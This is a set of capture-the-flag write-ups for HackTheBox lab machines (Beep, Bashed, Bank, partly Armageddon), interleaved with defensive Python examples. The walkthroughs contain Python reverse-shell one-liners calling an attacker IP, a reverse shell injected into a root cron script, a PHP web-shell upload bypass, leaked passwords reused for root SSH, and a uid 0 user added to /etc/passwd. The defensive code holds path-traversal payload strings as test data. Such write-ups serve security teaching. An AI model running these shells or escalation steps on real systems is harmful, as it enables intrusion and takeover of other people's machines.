ZAP2DAHDICOMPAT=true
# DEFAULT VALUE: false
# If set to true, FreePBX will check if you have chan_dadhi installed. If so, it will
# automatically use all your ZAP configuration settings (devices and trunks) and
# silently convert them, under the covers, to DAHDI so no changes are needed. The
# GUI will continue to refer to these as ZAP but it will use the proper DAHDI channels.
# This will also keep Zap Channel DIDs working.

# CHECKREFERER=true|false
# DEFAULT VALUE: true
# When set to the default value of true, all requests into FreePBX that might possibly add/edit/delete
# settings will be validated to assure the request is coming from the server. This will protect the system
# from CSRF (cross site request forgery) attacks. It will have the effect of preventing legitimately entering
# URLs that could modify settings which can be allowed by changing this field to false.

# USEQUEUESTATE=true|false
# DEFAULT VALUE: false
# Setting this flag will generate the required dialplan to integrate with the following Asterisk patch:
# https://issues.asterisk.org/view.php?id=15168
# This feature is planned for a future 1.6 release but given the existence of the patch can be used prior. Once
# the release version is known, code will be added to automatically enable this format in versions of Asterisk
# that support it.

# USEGOOGLEDNSFORENUM=true|false
# DEFAULT VALUE: false
# Setting this flag will generate the required global variable so that enumlookup.agi will use Google DNS
# 8.8.8.8 when performing an ENUM lookup. Not all DNS deals with NAPTR record, but Google does. There is a
# drawback to this as Google tracks every lookup. If you are not comfortable with this, do not enable this
# setting. Please read Google FAQ about this: http://code.google.com/speed/public-dns/faq.html#privacy

# MOHDIR=subdirectory_name
# This is the subdirectory for the MoH files/directories which is located in ASTVARLIBDIR
# if not specified it will default to mohmp3 for backward compatibility.
MOHDIR=mohmp3

# RELOADCONFIRM=true|false
# DEFAULT VALUE: true
# When set to false, will bypass the confirm on Reload Box

# FCBEEPONLY=true|false
# DEFAULT VALUE: false
# When set to true, a beep is played instead of confirmation message when activating/de-activating:
# CallForward, CallWaiting, DayNight, DoNotDisturb and FindMeFollow

# DISABLECUSTOMCONTEXTS=true|false
# DEFAULT VALUE: false
# Normally FreePBX auto-generates a custom context that may be usable for adding custom dialplan to modify the
# normal behavior of FreePBX. It takes a good understanding of how Asterisk processes these includes to use
# this and in many of the cases, there is no useful application. All includes will result in a WARNING in the
# Asterisk log if there is no context found to include though it results in no errors. If you know that you
# want the includes, you can set this to true. If you comment it out FreePBX will revert to legacy behavior
# and include the contexts.

# AMPMODULEXML lets you change the module repository that you use. By default, it
# should be set to http://mirror.freepbx.org/ - Presently, there are no third
# party module repositories.
AMPMODULEXML=http://mirror.freepbx.org/

# AMPMODULESVN is the prefix that is appended to tags in the XML file.
# This should be set to http://mirror.freepbx.org/modules/
AMPMODULESVN=http://mirror.freepbx.org/modules/

AMPDBNAME=asterisk
ASTETCDIR=/etc/asterisk
ASTMODDIR=/usr/lib/asterisk/modules
ASTVARLIBDIR=/var/lib/asterisk
ASTAGIDIR=/var/lib/asterisk/agi-bin
ASTSPOOLDIR=/var/spool/asterisk
ASTRUNDIR=/var/run/asterisk
ASTLOGDIR=/var/log/asterisk
Sorry! Attempt to access restricted file.
```

The above output reveals credentials in the amportal.conf file:

User: admin/root | Password: jEhdIekWmdjE

...And login successful:

Perhaps we could ssh?

```
# ssh [email protected]
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
```

I have received an error which, according to an opinion on the internet, is received since the algorithm is considered legacy? Resolved it by manually selecting it.

```
# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
The authenticity of host '10.10.10.7 (10.10.10.7)' can't be established.
RSA key fingerprint is SHA256:Ip2MswIVDX1AIEPoLiHsMFfdg1pEJ0XXD5nFEjki/hI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.7' (RSA) to the list of known hosts.
[email protected]'s password:
Last login: Tue Jul 16 11:45:47 2019

Welcome to Elastix
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]#
[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
```

The host reused its password, so we're able to gain root through ssh.
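Both findings in the Beep write-up above are the same bug family seen from the defender's side: Webmin (CVE-2006-3392) normalised away `../` before decoding the request, so `..%01` survived, and vtiger's graph.php took `current_language` straight into an include and honoured a `%00` terminator. The following is an added example, not code from h3xu's post or from Elastix/Webmin: it resolves a user-supplied name under a base directory in the safe order (decode fully, reject control bytes, then compare real paths), and pairs it with the stronger fix for a language selector, a fixed allowlist so the parameter is never treated as a path. The `ALLOWED_LANGUAGES` set, the `SAMPLE_INPUTS` and the temporary directory are all constructed for the example.

```python
"""Safe resolution of a user-supplied file name under a base directory.

Added example (not from the write-up): decode, reject control bytes, then
normalise and compare real paths. Allowlist and sample inputs are constructed.
"""
import os
import tempfile
from urllib.parse import unquote


class UnsafePath(ValueError):
    """Raised when a supplied name would leave the base directory."""


def resolve_under(base_dir: str, user_value: str) -> str:
    """Return the absolute path for user_value, or raise UnsafePath."""
    # 1. Decode fully BEFORE any normalisation, repeating so that a
    #    double-encoded "%252e%252e" does not survive a single pass.
    decoded = user_value
    for _ in range(3):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    # 2. Reject NUL and other control bytes: NUL truncates C string APIs
    #    (the %00 trick) and "..%01" only works because \x01 is not "/".
    if any(ord(ch) < 0x20 for ch in decoded):
        raise UnsafePath("control character in path")
    # 3. Normalise AFTER decoding and compare against the real base dir,
    #    so symlinks and any remaining ".." are resolved before the check.
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, target]) != base:
        raise UnsafePath("path escapes base directory")
    return target


# Constructed allowlist: a language selector should never be a path at all.
ALLOWED_LANGUAGES = frozenset({"en_us", "de_de", "bg_bg"})


def language_file(base_dir: str, requested: str) -> str:
    """Map an allowlisted language code to its file; anything else fails."""
    if requested not in ALLOWED_LANGUAGES:
        raise UnsafePath("unknown language")
    return os.path.join(os.path.realpath(base_dir), requested + ".php")


# Constructed inputs: one legitimate name, the traversal shapes from the
# write-up (%00 terminator, ..%01), a double-encoded variant, an absolute path.
SAMPLE_INPUTS = (
    "en_us.php",
    "../../../../../../../../etc/amportal.conf%00",
    "..%01/..%01/..%01/etc/passwd",
    "%252e%252e/%252e%252e/etc/passwd",
    "/etc/passwd",
)


def classify(base_dir: str, values) -> dict:
    """Map each candidate to 'allowed' or 'rejected'."""
    result = {}
    for value in values:
        try:
            resolve_under(base_dir, value)
            result[value] = "allowed"
        except UnsafePath:
            result[value] = "rejected"
    return result


def demo() -> dict:
    """Build a throwaway language directory and classify SAMPLE_INPUTS."""
    base = tempfile.mkdtemp(prefix="langs-")
    with open(os.path.join(base, "en_us.php"), "w") as fh:
        fh.write("<?php // stub language file\n")
    return classify(base, SAMPLE_INPUTS)


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{verdict:8s} {name!r}")
```

Only the legitimate name is allowed; the `%00` and `..%01` shapes fail at the control-byte check, and the double-encoded and absolute forms fail at the real-path comparison. Of the two functions, `language_file` is the one to prefer for a parameter like `current_language`: with an allowlist there is no path to sanitise.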
  7. h3xu

    Bashed

# Enumeration

## NMAP

We have an open port at 80, running Apache 2.4.18 (UBUNTU).

```
# nmap -A 10.10.10.68
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-08 03:14 EDT
Nmap scan report for 10.10.10.68
Host is up (0.050s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/8%OT=80%CT=1%CU=43586%PV=Y%DS=2%DC=T%G=Y%TM=606EAD62
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops

TRACEROUTE (using port 5900/tcp)
HOP RTT      ADDRESS
1   50.56 ms 10.10.14.1
2   50.73 ms 10.10.10.68

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.14 seconds
```

## Let's see what this website is about.

## Dirbuster report

It reveals a bunch of directories and files that are interesting:

```
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Apr 08 03:25:09 EDT 2021
--------------------------------

http://10.10.10.68:80
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/
/css/
/dev/
/images/
/js/
/demo-images/
/php/
/uploads/

Dirs found with a 403 response:

/icons/
/icons/small/

--------------------------------
Files found during testing:

Files found with a 200 responce:

/dev/phpbash.min.php
/index.html
/single.html
/css/carouFredSel.css
/css/clear.css
/dev/phpbash.php
/css/common.css
/css/font-awesome.min.css
/css/sm-clean.css
/js/jquery.js
/js/imagesloaded.pkgd.js
/js/jquery.nicescroll.min.js
/js/jquery.smartmenus.min.js
/js/jquery.carouFredSel-6.0.0-packed.js
/js/jquery.mousewheel.min.js
/js/jquery.touchSwipe.min.js
/js/jquery.easing.1.3.js
/js/main.js
/js/custom_google_map_style.js
/js/html5.js
/config.php
/php/sendMail.php

--------------------------------
```

The developer boasts about a phpbash file which he created onto the platform. Let's use it to get a foothold.

# Burp Suite

I am going to try and see the contents of the discovered files.

## Request

The file runs bash commands on the local host. Let's cat our flags 🙂

```
POST /dev/phpbash.min.php/ HTTP/1.1
Host: 10.10.10.68
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Origin: http://10.10.10.68
Referer: http://10.10.10.68/dev/phpbash.min.php/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

cmd=cd /home/arrexel;pwd;ls;cat user.txt;
```

## Response

user flag: 2c281f318555dbc1b856957c7147bfc1

```
HTTP/1.1 200 OK
Date: Thu, 08 Apr 2021 08:02:27 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 56
Connection: close
Content-Type: text/html; charset=UTF-8

/home/arrexel
user.txt
2c281f318555dbc1b856957c7147bfc1
```

### Let's see how we can escalate our privileges and gain root.

Firstly, get a reverse shell:

1. Change attacking IP:PORT:

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

### Let's upgrade our shell, so that we could make it more usable:

1. Spawn a better shell: `python3 -c 'import pty;pty.spawn("/bin/bash")'`
2. Get access to term commands: `export TERM=xterm`
3. Background the shell with CTRL + Z and turn on autocomplete etc. by typing in the original terminal: `stty raw -echo; fg`

# Privilege Esc.

* Ran linenum.sh locally but nothing really was of interest.
* Looked for SGID/SUID files.
* Finally, looking into sudoers I received the following output:

```
$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
```

It seems we (www-data) could run commands as user scriptmanager since it does not require a password.

```
$ sudo -u scriptmanager whoami
scriptmanager
```

To become user *scriptmanager* we type in: `sudo -u scriptmanager bash -i`

Let's enumerate further. What does this user own or have access to?

```
scriptmanager@bashed:/$ find / -type f -user scriptmanager 2>/dev/null
/scripts/test.py
/home/scriptmanager/.profile
/home/scriptmanager/.bashrc
/home/scriptmanager/.selected_editor
/home/scriptmanager/.bash_history
/home/scriptmanager/.bash_logout
```

It appears it owns something within /scripts/test.py

```
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
```

It opens test.txt and writes a string into it, hmm. Who owns test.txt?

```
scriptmanager@bashed:/scripts$ ll
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Apr  8 03:19 ./
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ../
-rw-r--r--  1 scriptmanager scriptmanager  282 Apr  8 03:19 test.py
-rw-r--r--  1 root          root            12 Apr  8 03:03 test.txt
```

So, if it is executed by cron, test.py runs as root since it opens test.txt which is owned by root. Let's add sauce: [python reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

```
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("change 123!")
python -c 'import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.6",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
f.close
```

It writes out the

### pwn

```
# nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.14.24] from (UNKNOWN) [10.10.10.68] 50176
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
```
  8. h3xu

    Bank

# Enumeration

### NMAP

The nmap scan reveals ports 53, 80 and 22 open, so we could assume that there are an HTTP web application, DNS and SSH services. Let's enumerate the DNS and check out the findings in our browser.

```
Host is up (0.047s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### [DNS Enumeration](https://medium.com/@klockw3rk/back-to-basics-dns-enumeration-446017957aa3)

```
# dig axfr @10.10.10.29 bank.htb

; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.10.29 bank.htb
; (1 server found)
;; global options: +cmd
bank.htb.        604800  IN  SOA    bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb.        604800  IN  NS     ns.bank.htb.
bank.htb.        604800  IN  A      10.10.10.29
ns.bank.htb.     604800  IN  A      10.10.10.29
www.bank.htb.    604800  IN  CNAME  bank.htb.
bank.htb.        604800  IN  SOA    bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 47 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Tue May 11 03:28:16 EDT 2021
;; XFR size: 6 records (messages 1, bytes 171)
```

# Web App Enumeration

#### /etc/hosts

Add the IP address to our known hosts file in /etc/hosts as:

```
10.10.10.29 bank.htb chris.bank.htb ns.bank.htb
```

#### chris.bank.htb

#### bank.htb

#### ns.bank.htb

#### Dirbuster

A couple of interesting directories were found for http://bank.htb, including the /balance-transfer/ directory, which is not present in the picture. The *user* and *ticket* files, on the other hand, do not return anything but the footer:

#### /balance-transfer/

Balance transfer is a directory which contains a bunch of encrypted accounts. While scrolling through the directory, looking for something out of the ordinary, I found a file that is 50% smaller than the rest of the files. When opened, it seems that encryption failed, since it is in plain text:

```
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: [email protected]
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
```

# Exploit

I have logged in to the given account and discovered a Support page which provides file upload functionality, revealing a possible attack surface.

## LFI

The file upload has restrictions in place that prevent me from uploading anything other than images. Let's bypass that with Burp Suite.

#### Burp Suite

After configuring our *php-reverse-shell.php* from pentestmonkey, we try to upload it into the file upload form while having *intercept on*. After we capture the POST request, we send it to Repeater in order to debunk the restrictions in place. And voila...

## Shell

Open a nc listener that will intercept the reverse call and execute the file.

```
$ curl "http://bank.htb/uploads/php-reverse-shell.php.jpeg" | php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  5492  100  5492    0     0  53843      0 --:--:-- --:--:-- --:--:-- 53843
PHP Notice:  Undefined variable: daemon in Standard input code on line 184
Successfully opened reverse shell to 10.10.14.3:1234
```

***Yikes***, I just hacked myself 😄 Anyway... let's try to forget about that and figure out my next move.

I read in the source code that the developer added an exception for the ***htb*** extension for debugging purposes and that files with such an extension will be executed as PHP. So I have uploaded the reverse shell as an htb file and just opened it, which returned a shell.

```
# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 58982
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 12:37:52 up  2:18,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
```

# Privilege Escalation

We are logged in as www-data. In order to figure out our attack surface, I will run a script called unix-privesc-check. In the following lines, I am going to the /tmp folder because it is a writeable directory, and download the file from my local Kali system.

```
┌──(kali㉿kali)-[~/bank]
└─$ sudo cp /usr/share/unix-privesc-check/unix-privesc-check .

┌──(kali㉿kali)-[~/bank]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.29 - - [11/May/2021 05:40:44] "GET /unix-privesc-check HTTP/1.1" 200 -
10.10.10.29 - - [11/May/2021 05:41:21] "GET /unix-privesc-check HTTP/1.1" 200 -
```

```
$ cd tmp
$ touch file
$ ls
file
vmware-root
$ wget http://10.10.14.3:8000/unix-privesc-check
--2021-05-11 12:45:15--  http://10.10.14.3:8000/unix-privesc-check
Connecting to 10.10.14.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36801 (36K) [application/octet-stream]
Saving to: 'unix-privesc-check'

     0K .......... .......... .......... .....                100%  654K=0.05s

2021-05-11 12:45:16 (654 KB/s) - 'unix-privesc-check' saved [36801/36801]

$
```

Let's upgrade our session to be more intuitive and responsive.

```
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bank:/tmp$ export TERM=xterm
export TERM=xterm
www-data@bank:/tmp$ ^Z
zsh: suspended  nc -nlvp 1234

┌──(root💀kali)-[/home/kali/bank]
└─# stty raw -echo;fg
[1]  + continued  nc -nlvp 1234
```

Now I have tab-completion and all keys register as normal.

```
www-data@bank:/tmp$ chmod +x unix-privesc-check
www-data@bank:/tmp$ ./unix-privesc-check standard
...[snip]...
############################################
Checking if anyone except root can change /etc/passwd
WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd
```

Ok, so we have a writeable /etc/passwd file. Let's add a privileged user and escalate. Firstly, create a password:

```
$ openssl passwd -1 -salt hacker hacker
$1$hacker$TzyKlv0/R/c28R.GAeLw.1
```

Next, add the user as follows:

```
www-data@bank:/$ nano /etc/passwd
#################################
add the user in the document like so:
hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
#################################
www-data@bank:/$ su hacker
Password:
root@bank:/# whoami
root
root@bank:/#
```
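Added example (not code from the post above): a small Python helper that does what the /balance-transfer/ step did by eye, parsing an Apache autoindex listing and flagging files whose size is far from the median. The listing embedded in the block is a constructed sample in the mod_autoindex table layout; the file names in it are made up.

```python
"""Flag files in an Apache autoindex listing whose size is far from the
median, the way the undersized report in /balance-transfer/ was spotted.

Added example, not code from the original post. The listing below is a
constructed sample in the mod_autoindex table layout; file names are made up.
"""
from html.parser import HTMLParser
from statistics import median

# Constructed sample of an Apache mod_autoindex "fancy index" table.
SAMPLE_LISTING = """<html><body><h1>Index of /balance-transfer</h1>
<table>
<tr><th>Name</th><th>Last modified</th><th>Size</th></tr>
<tr><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td></tr>
<tr><td><a href="0a1b2c.acc">0a1b2c.acc</a></td><td align="right">2017-06-14 20:16  </td><td align="right">584 </td></tr>
<tr><td><a href="1d2e3f.acc">1d2e3f.acc</a></td><td align="right">2017-06-14 20:16  </td><td align="right">585 </td></tr>
<tr><td><a href="4a5b6c.acc">4a5b6c.acc</a></td><td align="right">2017-06-14 20:16  </td><td align="right">257 </td></tr>
<tr><td><a href="7d8e9f.acc">7d8e9f.acc</a></td><td align="right">2017-06-14 20:16  </td><td align="right">583 </td></tr>
<tr><td><a href="big.tar">big.tar</a></td><td align="right">2017-06-14 20:16  </td><td align="right">1.2K </td></tr>
</table></body></html>"""

_UNITS = {"": 1, "K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}


def parse_size(text):
    """Convert an autoindex size cell ('584', '1.2K', '-') to bytes, or None."""
    text = text.strip()
    if not text or text == "-":
        return None
    unit = text[-1].upper() if text[-1].isalpha() else ""
    number = text[:-1] if unit else text
    return int(float(number) * _UNITS[unit])


class AutoindexParser(HTMLParser):
    """Collect (href, size_cell_text) for every table row that has a link."""

    def __init__(self):
        super().__init__()
        self.rows = []
        self._row = None      # cell texts of the row being parsed
        self._href = None
        self._in_td = False

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            self._row, self._href = [], None
        elif tag == "td" and self._row is not None:
            self._in_td = True
            self._row.append("")
        elif tag == "a" and self._row is not None:
            self._href = dict(attrs).get("href")

    def handle_data(self, data):
        if self._in_td and self._row:
            self._row[-1] += data

    def handle_endtag(self, tag):
        if tag == "td":
            self._in_td = False
        elif tag == "tr" and self._row is not None:
            # Name, Last modified, Size: the third cell is the size.
            if self._href and len(self._row) >= 3:
                self.rows.append((self._href, self._row[2]))
            self._row = None


def listing_sizes(html):
    """Return {href: size_in_bytes} for the files in an autoindex page."""
    parser = AutoindexParser()
    parser.feed(html)
    return {href: size for href, cell in parser.rows
            if (size := parse_size(cell)) is not None}


def size_outliers(sizes, ratio=0.6):
    """Names of files smaller than ratio*median or larger than median/ratio."""
    if not sizes:
        return []
    mid = median(sizes.values())
    return sorted(name for name, size in sizes.items()
                  if size < mid * ratio or size > mid / ratio)


if __name__ == "__main__":
    sizes = listing_sizes(SAMPLE_LISTING)
    for name in size_outliers(sizes):
        print(f"{name}: {sizes[name]} bytes (median {median(sizes.values()):.0f})")
```

Point it at the saved HTML of a real listing (`listing_sizes(open("index.html").read())`) and the undersized file surfaces immediately instead of after scrolling through hundreds of entries; the ratio is the only knob worth tuning.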
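Added example (not from the post): a Python check for the state the privilege escalation above leaves behind, an /etc/passwd with an extra uid 0 entry whose password hash sits in the file itself rather than in /etc/shadow. The passwd text in the block is a constructed sample; only the hacker line is taken from the post.

```python
"""Audit an /etc/passwd for what the Bank privilege escalation leaves behind:
an extra uid 0 account carrying its own crypt(3) hash in the password field.

Added example, not code from the original post. SAMPLE_PASSWD is a
constructed sample; only the 'hacker' line is the one added in the post.
"""
import stat

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
chris:x:1000:1000:Chris:/home/chris:/bin/bash
hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
"""

# crypt(3) hash prefixes and the scheme each one indicates.
HASH_SCHEMES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                "$y$": "yescrypt", "$2y$": "bcrypt", "$2b$": "bcrypt"}


def parse_passwd(text):
    """Yield a dict per well-formed passwd line (7 colon-separated fields)."""
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        yield {"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
               "gecos": gecos, "home": home, "shell": shell}


def hash_scheme(pw_field):
    """Name the hash scheme in a passwd password field; None if shadowed/locked."""
    if pw_field in ("x", "*", "!", "!!", ""):
        return None
    for prefix, scheme in HASH_SCHEMES.items():
        if pw_field.startswith(prefix):
            return scheme
    return "unknown"


def audit_passwd(text):
    """Findings as (kind, detail): extra uid 0 users and inline hashes."""
    findings = []
    for e in parse_passwd(text):
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(("extra_uid0", e["name"]))
        scheme = hash_scheme(e["pw"])
        if scheme:
            # A hash in /etc/passwd itself means someone bypassed /etc/shadow.
            findings.append(("inline_hash", f"{e['name']}:{scheme}"))
    return findings


def world_writable(mode):
    """True if an st_mode grants write to 'other', the precondition of the attack."""
    return bool(mode & stat.S_IWOTH)


if __name__ == "__main__":
    import os
    print("/etc/passwd world-writable:",
          world_writable(os.stat("/etc/passwd").st_mode))
    for kind, detail in audit_passwd(SAMPLE_PASSWD):
        print(kind, detail)
```

Run against the live file with `audit_passwd(open("/etc/passwd").read())`; on a clean host both the mode check and the findings list come back empty.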
# Enumeration

### Service Scan

The service scan reveals two open ports. A web application is running and has interesting directories to check. Additionally, we see Drupal 7 running, which gives us somewhat of a direction.

```
# nmap -sC -sV -p-65535 armageddon
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-08 04:58 EDT
Nmap scan report for armageddon (10.10.10.233)
Host is up (0.050s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.82 seconds
```

### Droopescan

Thought to google Drupal scanners and got a tool from GitHub called droopescan.

```
# ./droopescan scan drupal -u http://armageddon
[+] Plugins found:
    profile http://armageddon/modules/profile/
    php http://armageddon/modules/php/
    image http://armageddon/modules/image/

[+] Themes found:
    seven http://armageddon/themes/seven/
    garland http://armageddon/themes/garland/

[+] Possible version(s):
    7.56

[+] Possible interesting urls found:
    Default changelog file - http://armageddon/CHANGELOG.txt

[+] Scan finished (0:01:07.454052 elapsed)
```

### Searchsploit

Further internet searches on the applicable exploits led me to Drupalgeddon, and I will try it out in the next stage.

```
$ searchsploit drupal
Exploit Title | Path
------------------------------------------------------------------------------------------------------------ | --------------------------
Drupal 4.0 - News Message HTML Injection | php/webapps/21863.txt
Drupal 4.1/4.2 - Cross-Site Scripting | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector | php/webapps/4510.txt
Drupal 5.21/6.16 - Denial of Service | php/dos/10826.sh
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php
